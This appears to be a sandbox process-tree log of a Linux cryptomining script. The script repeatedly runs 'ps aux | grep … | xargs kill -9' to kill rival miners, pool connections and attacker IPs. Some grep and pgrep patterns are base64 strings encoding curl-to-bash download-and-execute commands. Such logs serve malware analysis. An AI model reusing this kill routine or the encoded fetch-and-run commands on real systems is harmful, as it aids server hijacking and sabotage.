  PID:2108
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2106
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2115
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2114
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2113
- /bin/grep
  grep -v grep
  2⤵
  PID:2112
- /bin/ps
  ps aux
  2⤵
  PID:2111
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2120
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2119
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2118
- /bin/grep
  grep -v grep
  2⤵
  PID:2117
- /bin/ps
  ps aux
  2⤵
  PID:2116
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2125
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2124
- /bin/grep
  grep gitee.com
  2⤵
  PID:2123
- /bin/grep
  grep -v grep
  2⤵
  PID:2122
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2121
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2130
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2129
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2128
- /bin/grep
  grep -v grep
  2⤵
  PID:2127
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2126
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2135
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2134
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2133
- /bin/grep
  grep -v grep
  2⤵
  PID:2132
- /bin/ps
  ps aux
  2⤵
  PID:2131
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2140
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2139
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2138
- /bin/grep
  grep -v grep
  2⤵
  PID:2137
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2136
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2145
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2144
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2143
- /bin/grep
  grep -v grep
  2⤵
  PID:2142
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2141
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2150
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2149
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2148
- /bin/grep
  grep -v grep
  2⤵
  PID:2147
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2146
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2155
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2154
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2153
- /bin/grep
  grep -v grep
  2⤵
  PID:2152
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2151
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2160
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2159
- /bin/grep
  grep netdns
  2⤵
  PID:2158
- /bin/grep
  grep -v grep
  2⤵
  PID:2157
- /bin/ps
  ps aux
  2⤵
  PID:2156
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2165
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2164
- /bin/grep
  grep watchdogs
  2⤵
  PID:2163
- /bin/grep
  grep -v grep
  2⤵
  PID:2162
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2161
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2170
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2169
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:2168
- /bin/grep
  grep -v grep
  2⤵
  PID:2167
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2166
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2175
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2174
- /bin/grep
  grep kinsing
  2⤵
  PID:2173
- /bin/grep
  grep -v grep
  2⤵
  PID:2172
- /bin/ps
  ps aux
  2⤵
  PID:2171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2180
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2179
- /bin/grep
  grep redis2
  2⤵
  PID:2178
- /bin/grep
  grep -v grep
  2⤵
  PID:2177
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2176
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2186
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2185
- /bin/grep
  grep " ps"
  2⤵
  PID:2184
- /bin/grep
  grep -v aux
  2⤵
  PID:2183
- /bin/grep
  grep -v grep
  2⤵
  PID:2182
- /bin/ps
  ps aux
  2⤵
  PID:2181
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2191
- /bin/grep
  grep sync_supers
  2⤵
  PID:2189
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2190
- /bin/grep
  grep -v grep
  2⤵
  PID:2188
- /bin/ps
  ps aux
  2⤵
  PID:2187
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2196
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2195
- /bin/grep
  grep cpuset
  2⤵
  PID:2194
- /bin/grep
  grep -v grep
  2⤵
  PID:2193
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2192
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2202
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2201
- /bin/grep
  grep "x]"
  2⤵
  PID:2200
- /bin/grep
  grep -v aux
  2⤵
  PID:2199
- /bin/grep
  grep -v grep
  2⤵
  PID:2198
- /bin/ps
  ps aux
  2⤵
  PID:2197
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2208
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2207
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2206
- /bin/grep
  grep -v aux
  2⤵
  PID:2205
- /bin/grep
  grep -v grep
  2⤵
  PID:2204
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2203
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2214
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2213
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2212
- /bin/grep
  grep -v aux
  2⤵
  PID:2211
- /bin/grep
  grep -v grep
  2⤵
  PID:2210
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2219
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2218
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2217
- /bin/grep
  grep -v grep
  2⤵
  PID:2216
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2215
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2224
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2223
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2222
- /bin/grep
  grep -v grep
  2⤵
  PID:2221
- /bin/ps
  ps aux
  2⤵
  PID:2220
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2229
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2228
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2227
- /bin/grep
  grep -v grep
  2⤵
  PID:2226
- /bin/ps
  ps aux
  2⤵
  PID:2225
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2234
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2233
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2232
- /bin/grep
  grep -v grep
  2⤵
  PID:2231
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2230
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2239
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2238
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2237
- /bin/grep
  grep -v grep
  2⤵
  PID:2236
- /bin/ps
  ps aux
  2⤵
  PID:2235
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2244
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2243
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2242
- /bin/grep
  grep -v grep
  2⤵
  PID:2241
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2240
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2249
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2248
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2247
- /bin/grep
  grep -v grep
  2⤵
  PID:2246
- /bin/ps
  ps aux
  2⤵
  PID:2245
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2254
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2253
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2252
- /bin/grep
  grep -v grep
  2⤵
  PID:2251
- /bin/ps
  ps aux
  2⤵
  PID:2250
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2259
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2258
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2257
- /bin/grep
  grep -v grep
  2⤵
  PID:2256
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2255
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2264
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2263
- /bin/grep
  grep sustse
  2⤵
  PID:2262
- /bin/grep
  grep -v grep
  2⤵
  PID:2261
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2260
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2269
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2268
- /bin/grep
  grep sustse3
  2⤵
  PID:2267
- /bin/grep
  grep -v grep
  2⤵
  PID:2266
- /bin/ps
  ps aux
  2⤵
  PID:2265
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2275
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2274
- /bin/grep
  grep wget
  2⤵
  PID:2273
- /bin/grep
  grep mr.sh
  2⤵
  PID:2272
- /bin/grep
  grep -v grep
  2⤵
  PID:2271
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2270
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2281
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2280
- /bin/grep
  grep curl
  2⤵
  PID:2279
- /bin/grep
  grep mr.sh
  2⤵
  PID:2278
- /bin/grep
  grep -v grep
  2⤵
  PID:2277
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2276
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2287
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2286
- /bin/grep
  grep wget
  2⤵
  PID:2285
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2284
- /bin/grep
  grep -v grep
  2⤵
  PID:2283
- /bin/ps
  ps aux
  2⤵
  PID:2282
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2293
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2292
- /bin/grep
  grep curl
  2⤵
  PID:2291
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2290
- /bin/grep
  grep -v grep
  2⤵
  PID:2289
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2299
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2298
- /bin/grep
  grep wget
  2⤵
  PID:2297
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2296
- /bin/grep
  grep -v grep
  2⤵
  PID:2295
- /bin/ps
  ps aux
  2⤵
  PID:2294
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2305
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2304
- /bin/grep
  grep curl
  2⤵
  PID:2303
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2302
- /bin/grep
  grep -v grep
  2⤵
  PID:2301
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2300
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2311
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2310
- /bin/grep
  grep wget
  2⤵
  PID:2309
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2308
- /bin/grep
  grep -v grep
  2⤵
  PID:2307
- /bin/ps
  ps aux
  2⤵
  PID:2306
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2316
- /bin/grep
  grep curl
  2⤵
  PID:2315
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2314
- /bin/grep
  grep -v grep
  2⤵
  PID:2313
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2312
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2322
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2321
- /bin/grep
  grep j2.conf
  2⤵
  PID:2320
- /bin/grep
  grep -v grep
  2⤵
  PID:2319
- /bin/ps
  ps aux
  2⤵
  PID:2318
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2328
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2327
- /bin/grep
  grep wget
  2⤵
  PID:2326
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2325
- /bin/grep
  grep -v grep
  2⤵
  PID:2324
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2323
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2334
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2333
- /bin/grep
  grep curl
  2⤵
  PID:2332
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2331
- /bin/grep
  grep -v grep
  2⤵
  PID:2330
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2329
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2340
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2339
- /bin/grep
  grep wget
  2⤵
  PID:2338
- /bin/grep
  grep ficov
  2⤵
  PID:2337
- /bin/grep
  grep -v grep
  2⤵
  PID:2336
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2335
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2346
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2345
- /bin/grep
  grep curl
  2⤵
  PID:2344
- /bin/grep
  grep ficov
  2⤵
  PID:2343
- /bin/grep
  grep -v grep
  2⤵
  PID:2342
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2341
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2352
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2351
- /bin/grep
  grep wget
  2⤵
  PID:2350
- /bin/grep
  grep he.sh
  2⤵
  PID:2349
- /bin/grep
  grep -v grep
  2⤵
  PID:2348
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2347
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2358
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2357
- /bin/grep
  grep curl
  2⤵
  PID:2356
- /bin/grep
  grep he.sh
  2⤵
  PID:2355
- /bin/grep
  grep -v grep
  2⤵
  PID:2354
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2353
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2364
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2363
- /bin/grep
  grep wget
  2⤵
  PID:2362
- /bin/grep
  grep miner.sh
  2⤵
  PID:2361
- /bin/grep
  grep -v grep
  2⤵
  PID:2360
- /bin/ps
  ps aux
  2⤵
  PID:2359
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2370
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2369
- /bin/grep
  grep curl
  2⤵
  PID:2368
- /bin/grep
  grep miner.sh
  2⤵
  PID:2367
- /bin/grep
  grep -v grep
  2⤵
  PID:2366
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2365
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2375
- /bin/grep
  grep wget
  2⤵
  PID:2374
- /bin/grep
  grep nullcrew
  2⤵
  PID:2373
- /bin/grep
  grep -v grep
  2⤵
  PID:2372
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2371
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2382
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2381
- /bin/grep
  grep curl
  2⤵
  PID:2380
- /bin/grep
  grep nullcrew
  2⤵
  PID:2379
- /bin/grep
  grep -v grep
  2⤵
  PID:2378
- /bin/ps
  ps aux
  2⤵
  PID:2377
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2387
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2386
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2385
- /bin/grep
  grep -v grep
  2⤵
  PID:2384
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2383
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2392
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2391
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2390
- /bin/grep
  grep -v grep
  2⤵
  PID:2389
- /bin/ps
  ps aux
  2⤵
  PID:2388
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2397
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2396
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2395
- /bin/grep
  grep -v grep
  2⤵
  PID:2394
- /bin/ps
  ps aux
  2⤵
  PID:2393
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2402
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2401
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2400
- /bin/grep
  grep -v grep
  2⤵
  PID:2399
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2398
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2407
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2406
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2405
- /bin/grep
  grep -v grep
  2⤵
  PID:2404
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2403
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2412
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2411
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2410
- /bin/grep
  grep -v grep
  2⤵
  PID:2409
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2408
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2417
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2416
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2415
- /bin/grep
  grep -v grep
  2⤵
  PID:2414
- /bin/ps
  ps auxf
  2⤵
  PID:2413
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2422
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2421
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2420
- /bin/grep
  grep -v grep
  2⤵
  PID:2419
- /bin/ps
  ps auxf
  2⤵
  PID:2418
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2427
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2426
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2425
- /bin/grep
  grep -v grep
  2⤵
  PID:2424
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2423
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2432
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2431
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2430
- /bin/grep
  grep -v grep
  2⤵
  PID:2429
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2428
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2437
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2436
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2435
- /bin/grep
  grep -v grep
  2⤵
  PID:2434
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2433
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2442
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2441
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2440
- /bin/grep
  grep -v grep
  2⤵
  PID:2439
- /bin/ps
  ps auxf
  2⤵
  PID:2438
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2447
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2446
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2445
- /bin/grep
  grep -v grep
  2⤵
  PID:2444
- /bin/ps
  ps auxf
  2⤵
  PID:2443
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2452
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2451
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2450
- /bin/grep
  grep -v grep
  2⤵
  PID:2449
- /bin/ps
  ps auxf
  2⤵
  PID:2448
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2457
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2456
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2455
- /bin/grep
  grep -v grep
  2⤵
  PID:2454
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2453
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2462
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2461
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2460
- /bin/grep
  grep -v grep
  2⤵
  PID:2459
- /bin/ps
  ps auxf
  2⤵
  PID:2458
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2466
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2465
- /bin/grep
  grep -v grep
  2⤵
  PID:2464
- /bin/ps
  ps auxf
  2⤵
  PID:2463
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2472
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2471
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2470
- /bin/grep
  grep -v grep
  2⤵
  PID:2469
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2468
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2477
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2476
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:2475
- /bin/grep
  grep -v grep
  2⤵
  PID:2474
- /bin/ps
  ps auxf
  2⤵
  PID:2473
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2481
- - /usr/local/sbin/kill
    kill -9 2479
    3⤵
    PID:2482
- - /usr/local/bin/kill
    kill -9 2479
    3⤵
    PID:2482
- - /usr/sbin/kill
    kill -9 2479
    3⤵
    PID:2482
- - /usr/bin/kill
    kill -9 2479
    3⤵
    PID:2482
- - /sbin/kill
    kill -9 2479
    3⤵
    PID:2482
- - /bin/kill
    kill -9 2479
    3⤵
    PID:2482
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2480
- /bin/grep
  grep xiaoyao
  2⤵
  PID:2479
- /bin/ps
  ps auxf
  2⤵
  PID:2478
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2486
- - /usr/local/sbin/kill
    kill -9 2484
    3⤵
    PID:2487
- - /usr/local/bin/kill
    kill -9 2484
    3⤵
    PID:2487
- - /usr/sbin/kill
    kill -9 2484
    3⤵
    PID:2487
- - /usr/bin/kill
    kill -9 2484
    3⤵
    PID:2487
- - /sbin/kill
    kill -9 2484
    3⤵
    PID:2487
- - /bin/kill
    kill -9 2484
    3⤵
    - Reads CPU attributes
    PID:2487
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2485
- /bin/grep
  grep xiaoxue
  2⤵
  PID:2484
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2483
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2493
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2491
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2490
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2492
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:2489
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2499
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2498
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2497
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2496
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2495
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2501
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2500
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2503
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:2502
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2505
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:2504
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2507
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:2506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2509
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  - Reads CPU attributes
  PID:2508
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2511
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  PID:2510
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2513
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  PID:2512
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2515
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:2514
- /usr/bin/xargs
